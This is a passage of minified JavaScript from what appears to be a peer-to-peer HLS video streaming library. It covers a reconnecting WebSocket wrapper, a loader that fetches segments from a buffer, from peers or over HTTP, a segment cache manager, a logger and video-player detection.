                        connectionTimeout: 4000,
                        maxRetries: 1 / 0,
                        debug: !1
                    };
                }, a = function a(e, t, n) {
                    Object.defineProperty(t, n, {
                        get: function get() {
                            return e[n];
                        },
                        set: function set(t) {
                            e[n] = t;
                        },
                        enumerable: !0,
                        configurable: !0
                    });
                }, s = function s(e) {
                    return e.minReconnectionDelay + Math.random() * e.minReconnectionDelay;
                }, c = function c(e, t) {
                    var n = t * e.reconnectionDelayGrowFactor;
                    return n > e.maxReconnectionDelay ? e.maxReconnectionDelay : n;
                }, u = [
                    'onopen',
                    'onclose',
                    'onmessage',
                    'onerror'
                ], l = function l(e, t, n) {
                    Object.keys(n).forEach(function (t) {
                        n[t].forEach(function (n) {
                            var r = n[0], o = n[1];
                            e.addEventListener(t, r, o);
                        });
                    }), t && u.forEach(function (n) {
                        e[n] = t[n];
                    });
                }, f = function f(e, t, n) {
                    var o = this;
                    void 0 === n && (n = {});
                    var u, d, h = 0, p = 0, g = !0, v = null, y = {};
                    if (!(this instanceof f))
                        throw new TypeError('Failed to construct \'ReconnectingWebSocket\': Please use the \'new\' operator');
                    var m = i();
                    if (Object.keys(m).filter(function (e) {
                            return n.hasOwnProperty(e);
                        }).forEach(function (e) {
                            return m[e] = n[e];
                        }), !r(m.constructor))
                        throw new TypeError('Invalid WebSocket constructor. Set `options.constructor`');
                    var _ = m.debug ? function () {
                            for (var e = [], t = 0; t < arguments.length; t++) {
                                e[t] = arguments[t];
                            }
                            return console.log.apply(console, ['RWS:'].concat(e));
                        } : function () {
                        }, b = function b(e, t) {
                            return setTimeout(function () {
                                var n = new Error(t);
                                n.code = e, Array.isArray(y.error) && y.error.forEach(function (e) {
                                    return (0, e[0])(n);
                                }), u.onerror && u.onerror(n);
                            }, 0);
                        }, w = function w() {
                            if (_('handleClose', { shouldRetry: g }), p++, _('retries count:', p), p > m.maxRetries)
                                return void b('EHOSTDOWN', 'Too many failed connection attempts');
                            h = h ? c(m, h) : s(m), _('handleClose - reconnectDelay:', h), g && setTimeout(C, h);
                        }, C = function C() {
                            if (g) {
                                _('connect');
                                var n = u, r = 'function' == typeof e ? e() : e;
                                u = new m.constructor(r, t), d = setTimeout(function () {
                                    _('timeout'), u.close(), b('ETIMEDOUT', 'Connection timeout');
                                }, m.connectionTimeout), _('bypass properties');
                                for (var i in u) {
                                    [
                                        'addEventListener',
                                        'removeEventListener',
                                        'close',
                                        'send'
                                    ].indexOf(i) < 0 && a(u, o, i);
                                }
                                u.addEventListener('open', function () {
                                    clearTimeout(d), _('open'), h = s(m), _('reconnectDelay:', h), p = 0;
                                }), u.addEventListener('close', w), l(u, n, y), u.onclose = u.onclose || v, v = null;
                            }
                        };
                    _('init'), C(), this.close = function (e, t, n) {
                        void 0 === e && (e = 1000), void 0 === t && (t = '');
                        var r = void 0 === n ? {} : n, o = r.keepClosed, i = void 0 !== o && o, a = r.fastClose, s = void 0 === a || a, c = r.delay, l = void 0 === c ? 0 : c;
                        if (_('close - params:', {
                                reason: t,
                                keepClosed: i,
                                fastClose: s,
                                delay: l,
                                retriesCount: p,
                                maxRetries: m.maxRetries
                            }), g = !i && p <= m.maxRetries, l && (h = l), u.close(e, t), s) {
                            var f = {
                                code: e,
                                reason: t,
                                wasClean: !0
                            };
                            w(), u.removeEventListener('close', w), Array.isArray(y.close) && y.close.forEach(function (e) {
                                var t = e[0], n = e[1];
                                t(f), u.removeEventListener('close', t, n);
                            }), u.onclose && (v = u.onclose, u.onclose(f), u.onclose = null);
                        }
                    }, this.send = function (e) {
                        u.send(e);
                    }, this.addEventListener = function (e, t, n) {
                        Array.isArray(y[e]) ? y[e].some(function (e) {
                            return e[0] === t;
                        }) || y[e].push([
                            t,
                            n
                        ]) : y[e] = [[
                                t,
                                n
                            ]], u.addEventListener(e, t, n);
                    }, this.removeEventListener = function (e, t, n) {
                        Array.isArray(y[e]) && (y[e] = y[e].filter(function (e) {
                            return e[0] !== t;
                        })), u.removeEventListener(e, t, n);
                    };
                };
            e.exports = f;
        },
        function (e, t, n) {
            'use strict';
            Object.defineProperty(t, '__esModule', { value: !0 });
            var r = n(3), o = (function (e) {
                    e && e.__esModule;
                }(r), {
                    wsMaxRetries: 15,
                    wsReconnectInterval: 30,
                    p2pEnabled: !0,
                    wifiOnly: !1,
                    memoryCacheLimit: {
                        pc: 536870912,
                        mobile: 268435456
                    },
                    dcDownloadTimeout: 25,
                    logLevel: 'error',
                    tag: '',
                    webRTCConfig: {},
                    token: 'free',
                    appName: void 0,
                    appId: void 0,
                    signalCompressed: !1,
                    prefetchNum: 10,
                    channelIdPrefix: ''
                });
            o.validateSegment = function (e, t, n) {
                return !0;
            }, o.getStats = function (e, t, n) {
            }, o.getPeerId = function (e) {
            }, o.getPeersInfo = function (e) {
            }, t['default'] = o, e.exports = t['default'];
        },
        function (e, t, n) {
            'use strict';
            (function (r) {
                function o(e, t) {
                    if (!(e instanceof t))
                        throw new TypeError('Cannot call a class as a function');
                }
                function i(e, t) {
                    if (!e)
                        throw new ReferenceError('this hasn\'t been initialised - super() hasn\'t been called');
                    return !t || 'object' != _typeof(t) && 'function' != typeof t ? e : t;
                }
                function a(e, t) {
                    if ('function' != typeof t && null !== t)
                        throw new TypeError('Super expression must either be null or a function, not ' + _typeof(t));
                    e.prototype = Object.create(t && t.prototype, {
                        constructor: {
                            value: e,
                            enumerable: !1,
                            writable: !0,
                            configurable: !0
                        }
                    }), t && (Object.setPrototypeOf ? Object.setPrototypeOf(e, t) : e.__proto__ = t);
                }
                Object.defineProperty(t, '__esModule', { value: !0 });
                var s = function () {
                        function e(e, t) {
                            for (var n = 0; n < t.length; n++) {
                                var r = t[n];
                                r.enumerable = r.enumerable || !1, r.configurable = !0, 'value' in r && (r.writable = !0), Object.defineProperty(e, r.key, r);
                            }
                        }
                        return function (t, n, r) {
                            return n && e(t.prototype, n), r && e(t, r), t;
                        };
                    }(), c = n(0), u = function (e) {
                        return e && e.__esModule ? e : { 'default': e };
                    }(c), l = n(1), f = n(2), d = function (e) {
                        function t(e) {
                            o(this, t);
                            var n = i(this, (t.__proto__ || Object.getPrototypeOf(t)).call(this));
                            n.logger = e.logger;
                            var r = window.__p2p_loader__, a = r.scheduler, s = r.fetcher, c = r.p2pBlackList;
                            return n.bufMgr = e.bufMgr, n.xhrLoader = new e.loader(e), n.p2pEnabled = e.p2pEnabled, n.scheduler = a, n.fetcher = s, n.segmentId = e.segmentId, n.blockTypes = c, n;
                        }
                        return a(t, e), s(t, [
                            {
                                key: 'destroy',
                                value: function value() {
                                    this.abort();
                                }
                            },
                            {
                                key: 'abort',
                                value: function value() {
                                    this.xhrLoader.abort();
                                }
                            },
                            {
                                key: 'load',
                                value: function value(e, t, n) {
                                    var o = this, i = this.logger, a = e.frag, s = this.segmentId(a.level, a.sn, a.url);
                                    if (e.frag.segId = s, (0, l.isBlockType)(a.url, this.blockTypes)) {
                                        i.info('HTTP load blockType ' + a.url), e.frag.loadByHTTP = !0;
                                        var c = n.onSuccess;
                                        return n.onSuccess = function (e, t, n) {
                                            i.info('HTTP load time ' + (t.tload - t.trequest) + 'ms'), c(e, t, n);
                                        }, this.xhrLoader.load(e, t, n);
                                    }
                                    if (this.p2pEnabled && this.bufMgr.hasSegOfId(s)) {
                                        i.info('bufMgr found seg sn ' + a.sn + ' url ' + a.url);
                                        var u = this.bufMgr.getSegById(s), d = f.Buffer.from(u.data), h = new f.Buffer(u.data.byteLength);
                                        d.copy(h);
                                        var p = new Uint8Array(h).buffer, g = {
                                                url: e.url,
                                                data: p
                                            }, v = void 0, y = void 0, m = void 0, _ = void 0, b = void 0;
                                        v = performance.now(), y = m = v + 10, _ = b = a.loaded = u.size;
                                        var w = {
                                            trequest: v,
                                            tfirst: y,
                                            tload: m,
                                            loaded: _,
                                            total: b,
                                            retry: 0
                                        };
                                        a.loadByP2P = !0, e.frag.fromPeerId = u.fromPeerId, i.debug('bufMgr loaded ' + a.relurl + ' at ' + a.sn), r.nextTick(function () {
                                            n.onSuccess(g, w, e);
                                        });
                                    } else if (this.p2pEnabled && this.scheduler.hasAndSetTargetPeer(a.sn)) {
                                        this.scheduler.load(e, t, n);
                                        var C = n.onTimeout;
                                        n.onTimeout = function (e, r) {
                                            i.info('P2P timeout switched to HTTP load ' + a.relurl + ' at ' + a.sn), o.xhrLoader.load(r, t, n), n.onTimeout = C;
                                        };
                                        var P = n.onSuccess;
                                        n.onSuccess = function (e, t, r) {
                                            n.onSuccess = function () {
                                                i.warn('p2p loaded ' + a.sn + ', http ignore');
                                            }, o.bufMgr.hasSegOfId(s) || o.bufMgr.handleFrag(a.sn, a.level, s, e.data, a.fromPeerId || o.fetcher.peerId, !0), a.loadByP2P || o.fetcher.reportFlow(t.total), a.loaded = t.loaded, i.info((a.loadByP2P ? 'P2P' : 'HTTP') + ' loaded segment id ' + s), P(e, t, r);
                                        };
                                    } else {
                                        i.info('HTTP load ' + a.relurl + ' at ' + a.sn + ' level ' + a.level), e.frag.loadByHTTP = !0, this.xhrLoader.load(e, t, n);
                                        var E = n.onSuccess;
                                        n.onSuccess = function (e, t, n) {
                                            o.bufMgr.hasSegOfId(s) || o.bufMgr.handleFrag(a.sn, a.level, s, e.data, o.fetcher.peerId, !0), o.fetcher.reportFlow(t.total), i.info('HTTP loaded ' + s + ' time ' + (t.tload - t.trequest) + 'ms'), E(e, t, n);
                                        };
                                    }
                                }
                            }
                        ]), t;
                    }(u['default']);
                t['default'] = d, e.exports = t['default'];
            }.call(t, n(7)));
        },
        function (e, t, n) {
            'use strict';
            function r(e) {
                return e && e.__esModule ? e : { 'default': e };
            }
            function o(e) {
                if (Array.isArray(e)) {
                    for (var t = 0, n = Array(e.length); t < e.length; t++) {
                        n[t] = e[t];
                    }
                    return n;
                }
                return Array.from(e);
            }
            function i(e, t) {
                if (!(e instanceof t))
                    throw new TypeError('Cannot call a class as a function');
            }
            function a(e, t) {
                if (!e)
                    throw new ReferenceError('this hasn\'t been initialised - super() hasn\'t been called');
                return !t || 'object' != _typeof(t) && 'function' != typeof t ? e : t;
            }
            function s(e, t) {
                if ('function' != typeof t && null !== t)
                    throw new TypeError('Super expression must either be null or a function, not ' + _typeof(t));
                e.prototype = Object.create(t && t.prototype, {
                    constructor: {
                        value: e,
                        enumerable: !1,
                        writable: !0,
                        configurable: !0
                    }
                }), t && (Object.setPrototypeOf ? Object.setPrototypeOf(e, t) : e.__proto__ = t);
            }
            Object.defineProperty(t, '__esModule', { value: !0 });
            var c = function () {
                    function e(e, t) {
                        for (var n = 0; n < t.length; n++) {
                            var r = t[n];
                            r.enumerable = r.enumerable || !1, r.configurable = !0, 'value' in r && (r.writable = !0), Object.defineProperty(e, r.key, r);
                        }
                    }
                    return function (t, n, r) {
                        return n && e(t.prototype, n), r && e(t, r), t;
                    };
                }(), u = n(0), l = r(u), f = n(2), d = n(5), h = r(d), p = 52428800, g = function (e) {
                    function t(e, n) {
                        i(this, t);
                        var r = a(this, (t.__proto__ || Object.getPrototypeOf(t)).call(this));
                        r.logger = n.logger;
                        var o = e.browserInfo.device;
                        return r.maxBufSize = o === h['default'].device.PC_WEB || o === h['default'].device.PC_NATIVE ? n.memoryCacheLimit.pc : n.memoryCacheLimit.mobile, n.live && (r.maxBufSize = p), r._segPool = new Map(), r._currBufSize = 0, r.sn2Id = new Map(), r.overflowed = !1, r;
                    }
                    return s(t, e), c(t, [
                        {
                            key: 'hasSegOfId',
                            value: function value(e) {
                                return this._segPool.has(e);
                            }
                        },
                        {
                            key: 'hasSegOfSN',
                            value: function value(e) {
                                return this.sn2Id.has(e);
                            }
                        },
                        {
                            key: 'handleFrag',
                            value: function value(e, t, n, r) {
                                var o = arguments.length > 4 && void 0 !== arguments[4] ? arguments[4] : '', i = arguments.length > 5 && void 0 !== arguments[5] && arguments[5], a = void 0, s = r.byteLength;
                                if (i) {
                                    var c = f.Buffer.from(r);
                                    a = new f.Buffer(s), c.copy(a);
                                } else
                                    a = r;
                                var u = {
                                    sn: e,
                                    level: t,
                                    segId: n,
                                    data: a,
                                    size: s,
                                    fromPeerId: o
                                };
                                this._addSeg(u), this.sn2Id.set(e, u.segId);
                            }
                        },
                        {
                            key: '_addSeg',
                            value: function value(e) {
                                var t = this.logger;
                                for (this._segPool.set(e.segId, e), t.info('segment pool add seg ' + e.segId + ' level ' + e.level), this._currBufSize += parseInt(e.size), t.debug('seg.size ' + e.size + ' _currBufSize ' + this._currBufSize + ' cacheLimit ' + this.maxBufSize); this._currBufSize > this.maxBufSize;) {
                                    var n = [].concat(o(this._segPool.values())).shift();
                                    t.info('pop seg ' + n.segId + ' at ' + n.sn), this._segPool['delete'](n.segId), this.sn2Id['delete'](n.sn), this._currBufSize -= parseInt(n.size), this.overflowed || (this.overflowed = !0), this.emit(f.Events.BM_LOST, n.sn);
                                }
                            }
                        },
                        {
                            key: 'getSegById',
                            value: function value(e) {
                                return this._segPool.get(e);
                            }
                        },
                        {
                            key: 'getSegIdbySN',
                            value: function value(e) {
                                return this.sn2Id.get(e);
                            }
                        },
                        {
                            key: 'getSegbySN',
                            value: function value(e) {
                                var t = this.getSegIdbySN(e);
                                return this.getSegById(t);
                            }
                        },
                        {
                            key: 'clear',
                            value: function value() {
                                this._segPool.clear(), this.sn2Id.clear(), this._currBufSize = 0;
                            }
                        },
                        {
                            key: 'destroy',
                            value: function value() {
                                this.clear(), this.removeAllListeners();
                            }
                        },
                        {
                            key: 'currBufSize',
                            get: function get() {
                                return this._currBufSize;
                            }
                        }
                    ]), t;
                }(l['default']);
            t['default'] = g, e.exports = t['default'];
        },
        function (e, t, n) {
            'use strict';
            function r(e, t) {
                if (!(e instanceof t))
                    throw new TypeError('Cannot call a class as a function');
            }
            Object.defineProperty(t, '__esModule', { value: !0 });
            var o = function () {
                    function e(e, t) {
                        for (var n = 0; n < t.length; n++) {
                            var r = t[n];
                            r.enumerable = r.enumerable || !1, r.configurable = !0, 'value' in r && (r.writable = !0), Object.defineProperty(e, r.key, r);
                        }
                    }
                    return function (t, n, r) {
                        return n && e(t.prototype, n), r && e(t, r), t;
                    };
                }(), i = n(1), a = {
                    debug: 0,
                    info: 1,
                    warn: 2,
                    error: 3,
                    none: 4
                }, s = [
                    '_debugP',
                    '_infoP',
                    '_warnP',
                    '_errorP'
                ], c = function () {
                    function e(t) {
                        r(this, e), 'debug' !== t.logLevel && 'info' !== t.logLevel || (t.logLevel = 'warn'), '1' === (0, i.getQueryParam)('_debug') ? t.logLevel = 'info' : !0 === t.logLevel ? t.logLevel = 'warn' : !1 === t.logLevel ? t.logLevel = 'none' : t.logLevel in a || (t.logLevel = 'error');
                        for (var n = 0; n < a[t.logLevel]; n++) {
                            this[s[n]] = i.noop;
                        }
                    }
                    return o(e, [
                        {
                            key: 'debug',
                            value: function value(e) {
                                this._debugP(e);
                            }
                        },
                        {
                            key: 'info',
                            value: function value(e) {
                                this._infoP(e);
                            }
                        },
                        {
                            key: 'warn',
                            value: function value(e) {
                                this._warnP(e);
                            }
                        },
                        {
                            key: 'error',
                            value: function value(e) {
                                this._errorP(e);
                            }
                        },
                        {
                            key: '_debugP',
                            value: function value(e) {
                                console.log(e);
                            }
                        },
                        {
                            key: '_infoP',
                            value: function value(e) {
                                console.info(e);
                            }
                        },
                        {
                            key: '_warnP',
                            value: function value(e) {
                                console.warn(e);
                            }
                        },
                        {
                            key: '_errorP',
                            value: function value(e) {
                                console.error(e);
                            }
                        }
                    ]), e;
                }();
            t['default'] = c, e.exports = t['default'];
        },
        function (e, t, n) {
            'use strict';
            Object.defineProperty(t, '__esModule', { value: !0 }), t['default'] = function () {
                var e = 'unknown';
                for (var t in r) {
                    if (window[t]) {
                        e = r[t];
                        break;
                    }
                }
                return e;
            };
            var r = {
                DPlayer: 'dplayer',
                CBPlayer: 'cbplayer',
                jwplayer: 'jwplayer',
                videojs: 'videojs',
                Clappr: 'clappr',
                ckplayer: 'ckplayer',
                MediaElementPlayer: 'mediaelement',
                MediaElement: 'mediaelement',
                TcPlayer: 'tcplayer',
                flowplayer: 'flowplayer',
                Chimee: 'chimee',
                ChimeePlayer: 'chimee',
                HlsJsPlayer: 'xgplayer',
                fluidPlayer: 'fluidplayer',
                OpenPlayer: 'openplayer',
                Plyr: 'plyr',
                Playerjs: 'playerjs'
            };
            e.exports = t['default'];
        }
    ]);
});